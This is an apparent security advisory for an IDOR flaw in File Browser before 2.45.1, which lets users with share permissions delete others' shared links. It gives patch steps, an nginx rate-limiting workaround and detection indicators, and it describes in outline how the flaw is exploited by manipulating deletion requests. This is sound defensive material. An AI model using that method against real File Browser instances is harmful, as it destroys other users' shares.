CVE-2025-64523
📋 TL;DR
This CVE describes an Insecure Direct Object Reference (IDOR) vulnerability in File Browser versions before 2.45.1. Any authenticated user with share permissions can delete other users' shared links without proper authorization checks. This affects organizations using File Browser for collaborative file sharing and management.
💻 Affected Systems
- File Browser
📦 What is this software?
Filebrowser by Filebrowser
⚠️ Risk & Real-World Impact
Worst Case
Malicious actors systematically delete all shared links, causing complete disruption of file sharing operations, data loss in collaborative environments, and breach of confidentiality agreements.
Likely Case
Disgruntled or malicious users delete shared links they shouldn't have access to, disrupting specific projects or collaborations and causing operational delays.
If Mitigated
With proper access controls and monitoring, impact is limited to isolated incidents that can be quickly detected and restored from backups.
🎯 Exploit Status
Exploitation requires authenticated access but is technically simple - an attacker just needs to manipulate share deletion requests. No special tools or skills required beyond basic HTTP request manipulation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.45.1
Vendor Advisory: https://github.com/filebrowser/filebrowser/security/advisories/GHSA-6cqf-cfhv-659g
Restart Required: Yes
Instructions:
1. Backup your File Browser configuration and data
2. Stop the File Browser service
3. Update to version 2.45.1 or later using your package manager or manual installation
4. Restart the File Browser service
5. Verify the update was successful
🔧 Temporary Workarounds
Restrict Share Permissions
allTemporarily limit which users have share permissions to reduce attack surface
# Edit File Browser configuration to restrict share permissions
# See documentation at https://filebrowser.org/configuration/permissions
Implement API Rate Limiting
linuxAdd rate limiting to share deletion endpoints to limit damage from automated attacks
# Configure rate limiting via reverse proxy (nginx example):
location /api/share/delete {
limit_req zone=share_limit burst=5 nodelay;
proxy_pass http://filebrowser:8080;
}
🧯 If You Can't Patch
- Implement strict access controls and audit all users with share permissions
- Enable detailed logging of all share deletion activities and implement real-time monitoring
🔍 How to Verify
Check if Vulnerable:
Check File Browser version. If version is below 2.45.1, the system is vulnerable.Check Version:
filebrowser versionVerify Fix Applied:
After updating, verify version is 2.45.1 or higher and test that users cannot delete shares they don't own.📡 Detection & Monitoring
Log Indicators:
- Multiple DELETE requests to /api/share/ endpoints from single user
- Failed authorization attempts followed by successful share deletions
- Unusual patterns of share deletions outside normal business hours
Network Indicators:
- HTTP DELETE requests to share endpoints with different user IDs than the authenticated user
- Rapid sequence of share deletion API calls
SIEM Query:
source="filebrowser.log" AND (method="DELETE" AND uri="/api/share/*") | stats count by user, uri